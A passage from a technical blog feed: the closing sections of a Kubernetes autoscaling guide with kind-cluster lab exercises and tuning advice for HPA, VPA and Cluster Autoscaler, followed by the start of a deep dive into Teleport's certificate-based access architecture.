🧠 Mental Model: Requests Drive Cost, Not Usage

In Kubernetes, you pay for what you reserve, not what you use. The scheduler, the bin-packer, and CA all operate on requests. VPA optimizes requests. This means every VPA recommendation upward is a potential cost event — even if actual utilization is unchanged.

Autoscaling optimizes for performance first, cost second unless explicitly constrained. HPA and VPA have no cost objective — they optimize to keep the metric within bounds. Over-scaling is operationally safer than under-scaling from their perspective. If cost matters (it always does), you need to encode it through maxReplicas, maxAllowed bounds, and node pool configuration — the autoscalers will not self-constrain.

Prevent CA overshoot: If VPA evicts a large batch of pods simultaneously, the scheduler may not fit them all, triggering CA to provision capacity for a transient condition. Stage transitions between VPA updateMode values, and consider CA's --scale-down-delay-after-add to prevent immediate scale-in after a VPA-triggered provisioning event.

Overprovisioning buffers address the CA latency problem directly. Deploy a Deployment of low-priority placeholder pods (using a PriorityClass with a negative value) sized to your expected burst headroom. These pods consume cluster capacity when idle, keeping nodes warm and schedulable. When real pods scale out, the scheduler evicts the placeholder pods to make room — no CA provisioning required. The cost is always-on reserved capacity; the benefit is eliminating the 2–4 minute bootstrap lag from your scaling critical path.

🧪 Exercise 9: Trigger Pending Pods via VPA Request Inflation

In kind, nodes have fixed resources. You can reproduce the VPA-inflates-requests-causing-unschedulable scenario by setting maxAllowed to values larger than your kind node's allocatable capacity.

# First, check your kind nodes' allocatable CPU and memory
kubectl describe nodes | grep -A5 "Allocatable:"

# Deploy a tight workload
kubectl create deployment inflate-test --image=nginx
kubectl set resources deployment inflate-test \
  --requests=cpu=100m,memory=64Mi --limits=cpu=200m,memory=128Mi
kubectl scale deployment inflate-test --replicas=3

# Create VPA with maxAllowed far exceeding available per-node headroom
# Adjust these numbers to be just over your node's allocatable / 3
cat <<EOF | kubectl apply -f -
apiVersion: autoscaling.k8s.io/v1
kind: VerticalPodAutoscaler
metadata:
  name: inflate-test-vpa
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: inflate-test
  updatePolicy:
    updateMode: "Auto"
  resourcePolicy:
    containerPolicies:
    - containerName: nginx
      minAllowed:
        cpu: 800m      # Intentionally large — adjust to exceed your node headroom
        memory: 512Mi
      maxAllowed:
        cpu: 2
        memory: 2Gi
EOF

# Watch for Pending pods
kubectl get pods -l app=inflate-test --watch &

# After VPA evicts and re-creates pods with large requests, check for Pending
kubectl get events --field-selector reason=FailedScheduling --watch

What to observe: After VPA injects the inflated requests, some pods may enter Pending state because no single node has enough remaining allocatable resources. In a real cluster, this is the trigger for Cluster Autoscaler to provision new nodes.

Cleanup:

kubectl delete deployment inflate-test
kubectl delete vpa inflate-test-vpa

Operational Gotchas

VPA's OOM learning problem: VPA recommends based on observed usage. If your application hasn't experienced peak load during the observation window, VPA will under-recommend memory. An OOMKill resets the histogram's confidence weighting. Always set minAllowed bounds anchored to values from load testing, not from observed idle-state usage.

CPU throttling blindspot: If your containers have tight CPU limits, container_cpu_throttled_seconds_total will be high but observed CPU usage will appear low. VPA will recommend lower CPU requests, worsening the throttling. Always check the throttling metric before acting on VPA CPU recommendations.

Memory target at p95 is not a ceiling: VPA recommends memory at p95, meaning 5% of observed samples exceeded the recommendation. For workloads with heavy GC or periodic batch operations, the tail can be large. Setting maxAllowed memory without headroom above p95 will still produce OOMKills at peak.

🧪 Exercise 10: Inspect VPA Recommendations Under CPU Throttling

This exercise demonstrates the CPU throttling blindspot: tight limits cause VPA to recommend less CPU, creating a vicious cycle.

Step 1: Deploy with intentionally tight CPU limits
cat <<EOF | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
  name: throttle-test
spec:
  replicas: 1
  selector:
    matchLabels:
      app: throttle-test
  template:
    metadata:
      labels:
        app: throttle-test
    spec:
      containers:
      - name: app
        image: registry.k8s.io/ubuntu-slim:0.14
        resources:
          requests:
            cpu: 200m
          limits:
            cpu: 210m    # Limit barely above request — maximum throttling
        command: ["/bin/sh"]
        args:
        - "-c"
        - "while true; do yes >/dev/null; done"  # 100% CPU burn
EOF

# Attach a VPA
cat <<EOF | kubectl apply -f -
apiVersion: autoscaling.k8s.io/v1
kind: VerticalPodAutoscaler
metadata:
  name: throttle-test-vpa
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: throttle-test
  updatePolicy:
    updateMode: "Off"
  resourcePolicy:
    containerPolicies:
    - containerName: app
      minAllowed:
        cpu: 50m
      maxAllowed:
        cpu: 4
EOF
Step 2: Check throttling and VPA recommendation
# Check actual CPU usage — it will appear bounded by the limit
kubectl top pods -l app=throttle-test

# After 5+ minutes, check VPA recommendation
kubectl describe vpa throttle-test-vpa | grep -A10 "Container Recommendations"
What to observe: Even though the container is burning 100% CPU, kubectl top shows only ~200m (the limit). VPA sees this capped observation and may recommend a value near or below the current request. In a real environment, you'd check container_cpu_throttled_seconds_total in Prometheus to confirm throttling.

Cleanup:
kubectl delete deployment throttle-test
kubectl delete vpa throttle-test-vpa

Autoscaling Failure Taxonomy

Production autoscaling incidents tend to fall into a small number of reusable classes. Naming them makes debugging faster — you can pattern-match a symptom to a class before you have the full picture.

Failure Class	Root Cause	Observable Symptom	Canonical Example
Lag-induced saturation	Reaction pipeline slower than load ramp	High error rate for 90–120s before replicas increase	CPU HPA at 80% target + sudden 3× traffic spike
Signal distortion	Metric ≠ actual load	VPA recommends lower CPU despite high latency	CPU throttling suppresses observed usage
Control loop interference	Two loops reacting to the same signal	Oscillating replica count without load change	CPU-based HPA + VPA Auto mode running simultaneously
Capacity illusion	Scheduler or CA lag hides true capacity deficit	Pods Pending despite "sufficient" cluster capacity	VPA evicts pods during CA bootstrap window
Overcorrection / oscillation	Aggressive scale policies or too-low stabilization window	Replica count thrashes up and down under steady load	`scaleDown.stabilizationWindowSeconds: 0` on noisy metric
Bound-induced blindness	`maxReplicas` or `maxAllowed` set too conservatively	`ScalingLimited` condition True; SLO degraded but HPA appears healthy	`maxReplicas: 5` on a service that needs 20 during peak

When an autoscaling incident starts, the first question is: which class is this? The answer determines whether you look at metric freshness, HPA/VPA coupling, scheduler events, or policy configuration.

Production Incident Pattern: The Black Friday Failure Mode

Consider a typical API service under sudden high load:

Traffic spikes 5× over 2 minutes.
CPU metrics are ~30s stale. HPA does not yet see elevated utilization.
HPA eventually fires — but CPU target was set at 80%. The service is already saturated before the first new pod starts.
VPA, running in Auto mode, decides this is a good time to evict two pods to update their memory requests. Pod count temporarily drops.
The evicted pods cannot fit on existing nodes due to larger VPA-requested resources. CA begins provisioning — with a 2–4 minute bootstrap lag.
By the time new capacity is available, the load spike has peaked and is declining. CA provisions nodes that are no longer needed.

The fix is not a single knob. It requires: external metrics for HPA (RPS instead of CPU), VPA in Initial mode during high-risk windows, CA warm pools or overprovisioning buffers, and load-tested minAllowed VPA bounds.

🧪 Exercise 11: Simulate the Black Friday Failure Mode End-to-End

This pulls together HPA, VPA, and the scheduler to reproduce the scenario.

Step 1: Deploy the reference "API service"

cat <<EOF | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
  name: api-service
spec:
  replicas: 2
  selector:
    matchLabels:
      app: api-service
  template:
    metadata:
      labels:
        app: api-service
    spec:
      containers:
      - name: api
        image: registry.k8s.io/hpa-example
        ports:
        - containerPort: 80
        resources:
          requests:
            cpu: 200m
            memory: 64Mi
          limits:
            cpu: 500m
            memory: 128Mi
EOF

kubectl expose deployment api-service --port=80

# HPA with 80% CPU target (the anti-pattern)
cat <<EOF | kubectl apply -f -
apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: api-service
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: api-service
  minReplicas: 2
  maxReplicas: 10
  metrics:
  - type: Resource
    resource:
      name: cpu
      target:
        type: Utilization
        averageUtilization: 80   # Anti-pattern: too high, no headroom
EOF

# VPA in Auto mode (will evict during the spike)
cat <<EOF | kubectl apply -f -
apiVersion: autoscaling.k8s.io/v1
kind: VerticalPodAutoscaler
metadata:
  name: api-service-vpa
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: api-service
  updatePolicy:
    updateMode: "Auto"
EOF

Step 2: Apply a sudden 5× load spike

echo "Spike started at: $(date +%T)"
for i in {1..5}; do
  kubectl run spike-$i --image=busybox:1.28 --restart=Never -- \
    /bin/sh -c "while true; do wget -q -O- http://api-service; done" &
done

# Monitor everything simultaneously
watch -n3 "
  echo '=== HPA ==='; kubectl get hpa api-service;
  echo '=== Pods ==='; kubectl get pods -l app=api-service;
  echo '=== Events (last 5) ==='; kubectl get events --sort-by='.lastTimestamp' | tail -5
"

What to observe over ~10 minutes:

Initial delay before HPA fires (metric lag + sync period)
VPA evicting a pod during the spike (pod count temporarily drops)
HPA and VPA fighting over replica count
If pods request more resources after eviction, potential scheduling pressure

Step 3: Apply the fix and compare

# Stop the spike
for i in {1..5}; do kubectl delete pod spike-$i --ignore-not-found; done

# Fix 1: Lower HPA CPU target to leave headroom
kubectl patch hpa api-service --type='merge' -p='
spec:
  metrics:
  - type: Resource
    resource:
      name: cpu
      target:
        type: Utilization
        averageUtilization: 50'

# Fix 2: Switch VPA to Initial mode (no evictions of running pods)
kubectl patch vpa api-service-vpa --type='merge' -p='
spec:
  updatePolicy:
    updateMode: "Initial"'

echo "Fixed config applied at: $(date +%T)"

# Re-run the spike
for i in {1..5}; do
  kubectl run spike-$i --image=busybox:1.28 --restart=Never -- \
    /bin/sh -c "while true; do wget -q -O- http://api-service; done" &
done

watch -n3 "
  echo '=== HPA ==='; kubectl get hpa api-service;
  echo '=== Pods ==='; kubectl get pods -l app=api-service;
  echo '=== Events (last 5) ==='; kubectl get events --sort-by='.lastTimestamp' | tail -5
"

Cleanup everything:

for i in {1..5}; do kubectl delete pod spike-$i --ignore-not-found; done
kubectl delete deployment api-service php-apache hamster
kubectl delete hpa api-service php-apache --ignore-not-found
kubectl delete vpa api-service-vpa hamster-vpa --ignore-not-found
kubectl delete svc api-service php-apache --ignore-not-found

Choosing an Autoscaling Strategy

Given a workload, how do you decide what to configure? The right answer depends on the workload's scheduling properties, traffic shape, and operational risk tolerance — not on what's easiest to configure.

Workload is stateless and traffic is spiky?
  → HPA with external metric (RPS or queue depth)
  → Add CPU as a secondary ceiling if external pipeline is unreliable

Workload is stateful (database, queue, cache)?
  → VPA in Off or Initial mode only — use recommendations to right-size at deploy time
  → HPA only if the workload supports safe horizontal scaling

Traffic is queue-driven (async workers, batch processors)?
  → KEDA with queue-depth metric — HPA's pull-based model is a poor fit for push-based work

Workload is latency-sensitive (p99 SLO < 100ms)?
  → HPA with headroom baked into the target (50% CPU or lower, not 80%)
  → Overprovisioning buffer to absorb the CA bootstrap window
  → VPA in Initial mode; never Auto

CPU-bound workload with well-understood load curve?
  → HPA on CPU is acceptable if: target ≤ 60%, minReplicas absorbs the reaction window,
     and VPA is on an orthogonal metric or in Off mode

You are starting from scratch with no load data?
  → VPA in Off mode for 1–2 full traffic cycles to collect recommendations
  → Use recommendations to set initial requests, then graduate to HPA

The general principle: configure autoscaling conservatively (lower CPU targets, wider stabilization windows, explicit maxReplicas) and then loosen based on observed behavior. The failure modes of over-conservative configuration (slightly higher cost, slightly slower reaction) are far more recoverable than the failure modes of over-aggressive configuration (oscillation, cascading evictions, CA thrash).

Production Design Pattern: A Battle-Tested Reference Architecture

For a stateless, latency-sensitive service that you want to operate safely at scale:

# HPA: scale on RPS, not CPU
metrics:
- type: External
  external:
    metric:
      name: http_requests_per_second
    target:
      type: AverageValue
      averageValue: "400"

# Scaling policies: don't surge, don't collapse
behavior:
  scaleUp:
    policies:
    - type: Percent
      value: 50
      periodSeconds: 60
    selectPolicy: Min
  scaleDown:
    stabilizationWindowSeconds: 300
    policies:
    - type: Percent
      value: 10
      periodSeconds: 120

Pair this with VPA in Initial mode:

updatePolicy:
  updateMode: "Initial"   # inject at pod creation, never evict running pods
resourcePolicy:
  containerPolicies:
  - containerName: "*"
    minAllowed:
      cpu: 100m
      memory: 256Mi       # anchored to load test p99
    maxAllowed:
      cpu: 4
      memory: 4Gi

And complete the stack with:

CA warm pool or overprovisioning buffer (low-priority placeholder pods that get evicted first, keeping spare capacity pre-warmed)
CPU requests tuned to p50 load (not observed idle), informed by VPA recommendations after a full traffic cycle
--scale-down-delay-after-add on CA set to at least 10 minutes to prevent thrashing after a provisioning event

This architecture means HPA scales on a signal with no CPU-request coupling, VPA rightsizes without disrupting running pods, and CA only sees pressure from genuine, sustained scheduling demand.

Cost Dynamics of Autoscaling

Autoscalers have no cost objective — they optimize to keep metrics within bounds. This means cost consequences are entirely a function of how you constrain them.

HPA cost profile: Over-scaling costs money (idle pods billed at full rate). Under-scaling costs SLO attainment. The tradeoff is asymmetric: SLO violations have reputational and sometimes contractual consequences; idle capacity has a predictable cost. Most production systems err toward over-scaling by design, using minReplicas floors that keep pods warm even during off-peak hours. The cost of that floor is the explicit price of low-latency reaction.

VPA cost profile: VPA's cost impact is indirect and counterintuitive. By inflating requests, VPA can reduce bin-packing efficiency — larger requests mean fewer pods per node, which means more nodes for the same actual workload. The mechanism: CA provisions for request pressure, not usage pressure. A cluster running at 30% actual CPU utilization but 90% request utilization looks fully packed to CA. VPA can worsen this by pushing requests upward toward observed peaks. Track both actual utilization and request utilization as separate metrics.

CA cost profile: CA cost is a step function — it changes in node increments. This creates a zone of structural over-provisioning: the last node in a pool will typically carry only whatever load couldn't fit elsewhere, but it is billed the same as a fully loaded node. Overprovisioning buffer pods deliberately fill this slack, converting the wasted allocation into controlled headroom rather than accidental waste.

The lever most teams forget: maxAllowed in VPA and maxReplicas in HPA are your primary cost controls. Without explicit upper bounds, both systems will scale toward whatever is needed to satisfy the metric — with no regard for what that costs. Set these bounds based on cost budgets, not just technical ceilings.

What Experienced Engineers Actually Do

Theory and configuration syntax are table stakes. The harder-won knowledge is what practitioners actually run in production after a few incidents:

On metric selection: RPS or queue depth as the primary HPA signal, with CPU as a secondary ceiling to catch cases where the metrics pipeline has gaps or delays. CPU-only HPA is treated as a legacy pattern to migrate away from when the metrics infrastructure is available.

On VPA modes: Initial only for production workloads. Auto mode is reserved for non-critical batch workloads or development environments where evictions are acceptable. The workflow for using VPA in production is: run in Off mode for two to four weeks across a full traffic cycle, collect recommendations, apply them to manifests via GitOps during a low-traffic window, and re-evaluate quarterly.

On request sizing: minAllowed in VPA is always anchored to load test p99 observed usage, not to VPA's recommendation from off-peak periods. This prevents VPA from shrinking requests toward near-zero values observed at 3am and then evicting pods at 9am when the requests no longer fit.

On CA and warm capacity: Overprovisioning buffer pods (low-priority Deployment + negative PriorityClass) are standard practice at any org that has been burned by CA bootstrap lag during a traffic event. The sizing is calibrated from load tests: buffer = expected peak replica count minus baseline replica count, sized for the workload's request footprint.

On stabilization: Scale-down stabilizationWindowSeconds of 300s (the default) is treated as a floor, not a ceiling. For services with expensive startup (JVM warmup, cache population), it is extended to 600–900s to prevent premature scale-in during multi-wave traffic patterns.

On observability: Alerting on ScalingLimited=True for more than two minutes, sustained Pending pods, and rising container_cpu_throttled_seconds_total before VPA recommendations are trusted. The debugging workflow is always: metrics first, then events, then pod resource comparison, then cross-loop interaction analysis.

Common Misconfigurations

HPA Anti-Patterns

CPU target above 75%: Leaves insufficient headroom for the ~90–120s reaction time pipeline. The service is already degraded before new pods serve traffic.
No scaleUp policies: Allows HPA to multiply replicas in a single cycle, potentially overwhelming downstream dependencies.
Using memory as a scale-out trigger: Memory-based HPA often fails to scale back in because most applications do not release allocated memory after load drops — the process holds the heap. HPA will see sustained high memory utilization and resist scale-in indefinitely. Use memory as an HPA metric only if you have confirmed your application actively releases memory under reduced load.
Not accounting for pod warm-up: A newly scheduled pod is not immediately useful. If your service has a slow startup (JVM warmup, cache population), include minReadySeconds and configure readiness probes that reflect actual traffic-readiness.

VPA Anti-Patterns

Auto mode on stateful workloads: Eviction of a database or queue pod mid-operation is a data risk. Use Off or Initial.
No minAllowed: Without a lower bound, VPA will shrink requests toward observed minimums, which may be near zero during off-peak hours.
Switching to Auto during peak traffic: Triggers an immediate wave of evictions. Always test mode changes in off-peak windows.
Combining with CPU-based HPA: Creates the feedback loop described earlier. Use orthogonal metrics.

Observability: Metrics That Matter

Autoscaling is only debuggable if you are measuring the right signals. The closing principle of this post — that the goal is observability, not perfect configuration — requires knowing exactly which metrics to watch.

HPA signals:

kube_horizontalpodautoscaler_status_desired_replicas vs kube_horizontalpodautoscaler_status_current_replicas — the gap between these is your scale lag in real time
kube_horizontalpodautoscaler_status_condition — surfaces ScalingLimited, AbleToScale, and ScalingActive conditions; ScalingLimited means rate policies or min/max bounds are constraining HPA from reaching its desired count
The raw metric value vs the target threshold for each configured metric — monitor these independently to catch noisy metrics driving unexpected scale decisions

VPA signals:

VPA.status.recommendation.containerRecommendations[].target vs actual pod requests — the gap is your rightsizing debt
Eviction events on VPA-managed pods (kubectl get events --field-selector reason=Evicted) — unexpected eviction frequency signals too-aggressive bounds or PDB misconfiguration
container_cpu_throttled_seconds_total — a high value means VPA's CPU observation is artificially suppressed; recommendations cannot be trusted until throttling is resolved
kube_pod_container_status_last_terminated_reason=OOMKilled — indicates VPA memory recommendations are too low or minAllowed is not set correctly

Cross-loop signals:

kube_pod_status_phase=Pending with reason=Unschedulable — the trigger condition for CA; sustained Pending pods mean either CA is bootstrapping or no node shape can fit the requested resources
Node instance type distribution over time — VPA-driven request inflation silently changing your node pool shape will appear here before it appears in cost reports

🧪 Exercise 12: Interrogate HPA Status Conditions

Practice reading the HPA status conditions that appear in production debugging. These conditions surface the internal state of the control loop.
# Assuming php-apache HPA still exists (or recreate it)
kubectl autoscale deployment php-apache --cpu-percent=50 --min=1 --max=2 2>/dev/null || true

# Read the full status conditions
kubectl get hpa php-apache -o jsonpath='{.status.conditions}' | python3 -m json.tool

# Drive it to its maxReplicas to trigger ScalingLimited
kubectl run limit-test --image=busybox:1.28 --restart=Never -- \
  /bin/sh -c "while true; do wget -q -O- http://php-apache; sleep 0.01; done"

# Wait for HPA to hit maxReplicas=2, then check conditions
sleep 60
kubectl describe hpa php-apache | grep -A20 "Conditions:"
What to observe: Once HPA hits maxReplicas, the ScalingLimited condition becomes True with a message indicating the bound was hit. In production, alerting on ScalingLimited=True for more than a few minutes signals that your maxReplicas is too low or your workload has genuinely outgrown its current sizing.
# Also useful: describe shows human-readable metric values
kubectl describe hpa php-apache | grep -A5 "Metrics:"

# Cleanup
kubectl delete pod limit-test --ignore-not-found
kubectl delete hpa php-apache --ignore-not-found
kubectl delete deployment php-apache --ignore-not-found
kubectl delete svc php-apache --ignore-not-found

Final Cleanup

When you're done with all exercises:

# Delete the kind cluster entirely
kind delete cluster --name autoscaling-lab

Summary

HPA Signal Tradeoff: CPU vs. External Metrics

Dimension	CPU	RPS / Queue Depth
Signal latency	High (lagging ~45s+)	Low (near-real-time)
Infra dependency	None	Metrics pipeline required
VPA coupling risk	High — distorts utilization ratio	None — orthogonal signal
Throttling blind spot	Yes	No
Stability	Higher	Lower (noisy metrics amplify)
Failure mode	Under-scaling	Over-scaling

HPA vs. VPA at a Glance

Dimension	HPA	VPA
Scaling axis	Horizontal (replica count)	Vertical (resource requests)
Reaction speed	Seconds to minutes	Minutes to hours
Pod disruption	None	Restart required (unless In-Place beta)
Control model	Delayed P-controller	Statistical percentile estimator
Safe to combine	—	Only on orthogonal metrics
Best for	Spiky, stateless workloads	Rightsizing; stateful workloads
PDB interaction	Respects during rolling update	Updater respects PDB — can stall silently

Full Reference

	HPA	VPA
Controller location	`kube-controller-manager`	Separate Deployment (3 components)
Metrics source	Metrics APIs (resource/custom/external)	metrics-server + historical samples

Understanding HPA as a delayed, saturating proportional controller with a 90–120 second reaction pipeline, and VPA as a statistical offline optimizer that must restart pods to apply its recommendations and cannot observe throttled CPU accurately, reframes how you tune both systems. Neither loop operates in isolation — they share the same node pool, react to overlapping signals, and can amplify each other's effects into the destabilizing positive feedback loops described above. Map symptoms to the failure taxonomy before reaching for knobs. Instrument the signals in the observability section, and you will know which loop to blame before the incident review is scheduled.

Autoscaling is not about making systems perfectly elastic — that's impossible given the phase lag, signal noise, and discrete provisioning steps involved. It is about designing systems where the failure modes are predictable, observable, and bounded. The engineers who succeed with autoscaling aren't the ones who tune it perfectly — they're the ones who understand how it breaks.

Further reading: KEP-1287 In-Place Pod Vertical Scaling · HPA algorithm design doc · autoscaling/v2 API reference

Originally published at https://platformwale.blog

How Teleport Works: A Deep Dive into Modern Infrastructure Access

Piyush Jajoo — Thu, 26 Mar 2026 15:40:09 +0000

Introduction
The Core Problem Teleport Solves
Teleport vs VPN vs Bastion Hosts
- VPN Model
- Bastion Host Model
- Teleport Model (Zero Trust Access Plane)
- Quick Comparison Table
Fundamental Architecture Concepts
- Non-Obvious Insight: Teleport Shifts the Trust Boundary
- The Cluster: Foundation of Teleport's Security Model
- Certificate-Based Authentication: The Heart of Teleport
- Short-Lived Certificates and Zero Standing Privileges
- Secure Node Enrollment (Join Tokens)
Teleport Architecture Deep Dive
- Control Plane vs Traffic Plane Separation
- Core Components
- 1. Auth Service: The Certificate Authority
- 2. Proxy Service: The Access Gateway
- 3. Teleport Agents: Protocol-Specific Services
- Unified Resource Inventory and Discovery
Advanced Features
- Role-Based Access Control (RBAC)
- Access Requests: Just-In-Time Privilege Escalation
- Session Recording and Playback
- Session Moderation and Shared Access
- Device Trust and Hardware Security
- Trusted Clusters: Multi-Org Federation
- Teleport Connect: Desktop Experience
How It All Works Together: Complete Flow Examples
- Example 1: SSH Access to Production Server
- Example 2: Database Access Request Workflow
- Example 3: Kubernetes Cluster Access
Getting Started with Teleport
- Quick Start: Local Testing
- Common Deployment Topologies
- Production Deployment Checklist
Performance and Scaling Considerations
- Connection Flow Overhead
- Scaling Characteristics
- High-Performance Deployments
Best Practices
- 1. Certificate TTL Configuration
- 2. Use Access Requests for Elevated Privileges
- 3. Implement a Governed Resource Labels Strategy
- 4. Enable Session Recording for All Production Access
- 5. Integrate with Your Security Stack
Failure Modes and Operational Realities
- Component Failure Behavior
- CA Rotation
- RBAC Sprawl
- Debugging is Harder Than Direct SSH Because Teleport Introduces Multiple Control Points — Each a Potential Failure Boundary
Trade-offs, Limitations, and Alternatives
- Teleport Trade-offs
- What Teleport Does NOT Solve
- Comparison With Modern Alternatives
- When Teleport Becomes a Bad Idea
- How Teams Typically Adopt Teleport
Opinionated Architecture Guidance
- Rules of Thumb for Production Deployments
Troubleshooting Common Issues
- Connection Issues
- Certificate Issues
- Performance Issues
Conclusion
Additional Resources

↑ Back to top

Introduction

The average production environment has hundreds of servers, dozens of databases, multiple Kubernetes clusters, and engineers connecting from laptops, CI pipelines, and cloud VMs across every network imaginable. The traditional answer — VPNs, bastion hosts, SSH keys that accumulate for years — was never designed for this. It was designed for a world where your infrastructure lived in one data center and your engineers sat in one office.

Teleport is a complete rethinking of infrastructure access for the distributed, ephemeral, multi-cloud reality most teams actually operate in. It replaces static credentials with short-lived certificates, VPN perimeters with identity-aware reverse tunnels, and fragmented audit trails with unified session recording across every protocol.

This document is a technical deep dive into how Teleport works — its architecture, security model, failure behavior, and the operational decisions you'll need to make to run it well in production. It's written for engineers evaluating Teleport, implementing it, or trying to operate it at scale.

Mental Model: Teleport = Identity-aware access proxy + certificate authority + audit system. Users authenticate via SSO, receive short-lived certificates scoped to their roles, and connect to resources through a proxy that routes traffic via reverse tunnels from agents. No standing credentials. Every session recorded. Access determined by identity, not network location.

↑ Back to top

The Core Problem Teleport Solves

Before diving into how Teleport works, let's understand the problems it addresses:

Traditional Infrastructure Access Challenges:

Static Credentials: SSH keys, database passwords, and API tokens that live forever and proliferate across systems
Trust on First Use (TOFU): The first SSH connection requires blindly trusting a host fingerprint
Access Sprawl: Different tools and methods for accessing servers, databases, Kubernetes, applications
Poor Auditability: Limited visibility into who accessed what, when, and what they did
Credential Management: Manual rotation, distribution, and revocation of access credentials
Network Complexity: VPNs, bastion hosts, and jump boxes that add latency and attack surface

Teleport addresses these challenges through a certificate-based authentication model, unified access proxy, and comprehensive audit logging.

↑ Back to top

Teleport vs VPN vs Bastion Hosts

Organizations have traditionally relied on VPNs and bastion hosts to provide infrastructure access. Teleport replaces these older models with a zero-trust, identity-native access plane.

Here’s how they compare:

VPN Model

VPNs extend the corporate network perimeter outward, effectively placing engineers “inside” the private network.

How it works:

User connects to VPN
Gains broad network-level access
Then uses SSH, kubectl, database clients directly

Limitations:

Network-level trust instead of identity-level trust
Difficult to enforce least privilege
Poor visibility into what happens after connection
VPN credentials are often long-lived
Expands attack surface by exposing entire subnets

Bastion Host Model

Bastion hosts (jump boxes) centralize SSH entry through a hardened server.

How it works:

User SSHs into bastion
Then hops into internal servers/databases

Limitations:

Still relies on SSH keys or static credentials
Bastion becomes a high-value attack target
Limited protocol support beyond SSH
Session recording and auditing require extra tooling
Scaling bastions across regions is operationally complex

Teleport Model (Zero Trust Access Plane)

Teleport replaces perimeter-based access with certificate-based, identity-aware access.

How it works:

Users authenticate via SSO + MFA
Teleport issues short-lived certificates
Proxy routes access to specific approved resources
Every session is recorded and audited

Key Advantages:

No VPN required for infrastructure access — Teleport eliminates the VPN for SSH, databases, Kubernetes, and applications; organizations may still use VPNs for legacy systems, unsupported protocols, or east-west traffic patterns
No inbound firewall rules (reverse tunnels)
Identity-based access, not network-based trust
Works across SSH, Kubernetes, databases, apps, desktops
Built-in audit logs, session playback, access requests
Credentials expire automatically (zero standing privileges)

Quick Comparison Table

Feature	VPN	Bastion Host	Teleport
Trust Model	Network perimeter	Jump-box perimeter	Zero Trust identity-based
Credentials	Long-lived	SSH keys	Short-lived certificates
Access Scope	Broad subnet access	Host-level	Resource + role scoped
Auditability	Weak	Limited	Full session + event audit
Protocol Support	Any network traffic	Mostly SSH	SSH, DB, K8s, Apps, RDP
Firewall Exposure	Requires network access	Bastion exposed inbound	Only Proxy exposed inbound
Privilege Escalation	Manual	Manual	Built-in Access Requests

Teleport modernizes infrastructure access by eliminating static credentials, reducing attack surface, and making access fully observable and time-bounded.

Teleport doesn't just replace SSH — it replaces the idea that networks should be trusted.

↑ Back to top

Fundamental Architecture Concepts

Non-Obvious Insight: Teleport Shifts the Trust Boundary

Most infrastructure security improvements add controls on top of an existing trust model. Teleport does something more fundamental — it shifts where trust lives.

Model	What Is Trusted
VPN	The network — if you're "inside", you're trusted
Bastion host	The jump box — SSH to it, then you're trusted
Teleport	Identity + device + time — the network is never trusted

Traditional systems ask: "Is this request coming from the right network?"

Teleport asks: "Is this a valid identity, with the right role, on an approved device, within a valid time window?"

This shift has a non-obvious consequence: Teleport makes your infrastructure location-independent by design. A contractor on a coffee shop WiFi, a CI pipeline in a cloud VM, and an on-call engineer on a home network all authenticate through the same identity-first path — with no VPN, no static keys, and no network-level exceptions to manage. The network becomes a commodity transport layer, not a security boundary.

This is what "zero trust" actually means in practice — not a product category, but a fundamental reorientation of where the perimeter lives.

The Cluster: Foundation of Teleport's Security Model

The cluster is the foundational concept in Teleport's architecture. A Teleport cluster is a logically grouped collection of services and resources that share a common certificate authority and security boundary.

Key Principle: Users and resources must join the same cluster before access can be granted. Teleport replaces SSH trust-on-first-use with CA-based node identity established during secure cluster join.

Certificate-Based Authentication: The Heart of Teleport

Teleport operates as a certificate authority (CA) that issues short-lived certificates to both users and infrastructure resources. This is fundamentally different from traditional password or SSH key-based authentication.

Why Certificates?

Cryptographically Secure: Much harder to forge than passwords or simple keys
Self-Contained: Include identity, permissions, and expiration in one signed document
Decentralized Signature Validation: Each service validates the certificate independently using the CA's public key — no Auth Service round-trip per request. However, authorization is still based on roles and policies centrally issued by the Auth Service, and revocation requires CA rotation, user lockout, or session termination rather than a simple flag flip.
Automatic Expiration: Expiration reduces reliance on revocation, though Teleport supports revocation mechanisms when needed
Scalable: Suitable for large deployments with many services

Short-Lived Certificates and Zero Standing Privileges

Teleport issues certificates with very short time-to-live (TTL) periods, typically a few hours (configurable via max_session_ttl). Access Requests may issue certificates for minutes or hours, and bot tokens often use much shorter TTLs. This creates a "zero standing privileges" model where access automatically expires.

Benefits of Short-Lived Certificates:

The security properties described above compound into practical operational wins: a stolen certificate expires on its own, offboarding requires no key revocation sweep, there's no accumulation of forgotten credentials across systems, and every access event is time-bounded by design — making compliance audits straightforward. The explicit revocation mechanisms (CA rotation, user lockout, session termination) exist for immediate invalidation when you can't wait for TTL expiry.

Secure Node Enrollment (Join Tokens)

A critical aspect of Teleport's security model is how agents and nodes securely join the cluster. This process establishes the initial trust relationship that underpins all subsequent certificate-based authentication.

Join Process:

Token Generation: Admin creates a join token via the Auth Service
Token Types:
- Static tokens (for testing/development)
- Dynamic tokens (one-time use, expire after period)
- Provisioning tokens (AWS IAM, Azure AD, GCP identity)
Secure Bootstrap: Node uses token to prove its identity to Auth Service
CA Pinning: Node receives and pins the cluster CA public key
Certificate Issuance: Auth Service issues node certificate after successful validation
Continuous Identity: Node uses certificate for all subsequent cluster interactions

Security Considerations:

Join tokens should be treated as highly sensitive credentials
Use dynamic, short-lived tokens in production
Leverage cloud provider identity (IAM roles) for automated, secure joins
Monitor join events in audit logs
Rotate join tokens regularly

This secure enrollment process ensures that even before certificate-based authentication begins, nodes have established verifiable trust with the cluster, eliminating the trust-on-first-use problem entirely.

↑ Back to top

Teleport Architecture Deep Dive

Control Plane vs Traffic Plane Separation

Teleport separates authority and policy decisions from session traffic handling:

Control Plane (Authority & State):

Auth Service: Certificate issuance, identity management, RBAC, policy evaluation
Backend storage: Cluster state, audit logs, session metadata
Management operations: User, role, and policy configuration

Traffic Plane (Session Path):

Proxy Service: Public gateway, client termination, policy enforcement, session routing and recording
Teleport Agents: Protocol-specific access to infrastructure resources
Session data: Live SSH, Kubernetes, database, application, and desktop traffic

The Auth Service never handles interactive traffic directly. All live sessions flow through the Proxy and Agents, using short-lived certificates issued by the Auth Service.

Core Components

